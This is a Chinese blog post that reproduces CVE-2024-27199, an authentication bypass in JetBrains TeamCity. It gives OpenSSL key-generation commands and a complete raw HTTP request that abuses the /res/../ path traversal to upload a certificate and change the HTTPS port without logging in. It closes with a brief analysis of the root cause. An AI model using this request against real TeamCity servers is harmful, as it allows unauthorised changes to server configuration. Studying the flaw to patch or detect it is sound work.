CVE-2024-27199 JetBrains TeamCity 身份验证绕过漏洞2

昵称还在想呢2024-03-12 12:34
漏洞简介

TeamCity Web 服务器中发现了第二个身份验证绕过漏洞。这种身份验证旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置,并泄露服务器上有限数量的敏感信息。

项目官网下载地址Other Versions - TeamCity

参考链接:

影响版本

< 2023.11.4

漏洞复现

1,服务信息泄露

2.HTTPS 证书上传

使用 OpenSSL 生成和处理 ECDSA 密钥对和证书

复制代码 
openssl ecparam -name prime256v1 -genkey -noout -out private-eckey.pem
openssl ec -in private-eckey.pem -pubout -out public-key.pem
openssl req -new -x509 -key private-eckey.pem -out cert.pem -days 360
openssl pkcs8 -topk8 -nocrypt -in private-eckey.pem -out hax.key

运行上面的命令生成如下文件

构造如下包,上传HTTPS 证书并设定8443端口

复制代码 
POST /res/../app/https/settings/uploadCertificate HTTP/1.1
Host: 192.168.116.128:8111
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Length: 1576

------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="certificate"; filename="cert.pem"
Content-Type: application/octet-stream

-----BEGIN CERTIFICATE-----
MIICYjCCAgegAwIBAgIUFHRabDe2dTOHNe8at5fDfsigDJwwCgYIKoZIzj0EAwIw
gYUxCzAJBgNVBAYTAmNuMQswCQYDVQQIDAJobjENMAsGA1UEBwwEbmFtZTEQMA4G
A1UECgwHY29tcGFueTESMBAGA1UECwwJdW5pdCBuYW1lMRQwEgYDVQQDDAtjb21t
b24tbmFtZTEeMBwGCSqGSIb3DQEJARYPYWRtaW5AYWRtaW4uY29tMB4XDTI0MDMx
MTA3NTQwN1oXDTI1MDMwNjA3NTQwN1owgYUxCzAJBgNVBAYTAmNuMQswCQYDVQQI
DAJobjENMAsGA1UEBwwEbmFtZTEQMA4GA1UECgwHY29tcGFueTESMBAGA1UECwwJ
dW5pdCBuYW1lMRQwEgYDVQQDDAtjb21tb24tbmFtZTEeMBwGCSqGSIb3DQEJARYP
YWRtaW5AYWRtaW4uY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMJ6RI0Xj
dm72v2AjYl0SGBPAC/TqXHbdSyJSzqDmsH1Du/M8vlBkO1QYnNbcuiqnvEHnfea4
WlDf5a1XnSQBB6NTMFEwHQYDVR0OBBYEFIP5qYGpT7CujDvYGCNtsCiycOmdMB8G
A1UdIwQYMBaAFIP5qYGpT7CujDvYGCNtsCiycOmdMA8GA1UdEwEB/wQFMAMBAf8w
CgYIKoZIzj0EAwIDSQAwRgIhAMcfVmbn711/5hOhnryKro9XH5m77DK/vmBvR0mk
SIYVAiEApXhoDMQiv/0NVbZrOyW+c6oMSlg3CuKtAj6Sd5hxWR0=
-----END CERTIFICATE-----

------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="key"; filename="hax.key"
Content-Type: application/octet-stream

-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgflqLec/N8uvpqGUK
Z7sGvs81dBDffRUw+ufigYq016ChRANCAAQwnpEjReN2bva/YCNiXRIYE8AL9Opc
dt1LIlLOoOawfUO78zy+UGQ7VBic1ty6Kqe8Qed95rhaUN/lrVedJAEH
-----END PRIVATE KEY-----

------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="port"

8443
------WebKitFormBoundary4d5hF7eNFFbgJoAC--

后台验证下证书是否上传

或者直接访问https://192.168.116.128:8443/

漏洞分析

产生漏洞的原因是该系统采用了spring框架,该框架在处理url时遇到url中的../会自行解析再次拼接,这可能会产生某些某些判断机制绕过的现象。其中/res/下的路径不需要认证就可以被服务器去请求,有如下定义

/app/https/settings/**有如下定义

相关推荐
晓梦林29 分钟前
Loooower靶场学习笔记
笔记·学习·安全·web安全
txg6661 小时前
网络安全领域简报(2026年5月1日~5月8日)
网络·安全·web安全
Bruce_Liuxiaowei3 小时前
从霍尔木兹到信息空间:现代冲突中的媒体行业安全新命题
人工智能·安全·系统安全·媒体
techdashen3 小时前
4 个字节拿到 root 权限:Linux 内核漏洞“Copy Fail“与 Cloudflare 的应急处置全记录
linux·网络·安全
wanhengidc3 小时前
算力服务器的优势都有哪些?
大数据·运维·服务器·网络·人工智能·安全·智能手机
S1998_1997111609•X3 小时前
超导致䗃系统固件损坏关闭进程函数洪水泛滥污染孪生镜像描述的逻辑串码缓存鸡dark and -blue 仺盀
安全·百度·缓存·哈希算法·量子计算
其实防守也摸鱼4 小时前
ctfshow--Crypto(crypto1-14)解题步骤
java·开发语言·网络·安全·密码学·ctf·ctfshow
星幻元宇VR4 小时前
VR雷霆双翼助力航空航天科普教育
科技·学习·安全·vr
jimy15 小时前
Oracle的oci实例vm.standard.e2.1.micro安装tailscale
服务器·安全·oracle
2301_780789665 小时前
DDOS防护的常见误区与解决方案
网络·安全·web安全·架构·ddos
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03零基础教你claude code 接入 deepseek V404要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法05Dirtyfrag漏洞:我花了一下午搞清楚这个Linux内核提权漏洞到底在搞什么06CC-Switch & Claude 基于 Linux 服务器安装使用指南07【AI】2026 年具身智能模型和世界模型总结08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09Linux 核弹级高危漏洞 CVE-2026-31431 完整修复指南10Windows端Codex接入第三方模型(DeekSeek,BaiLian)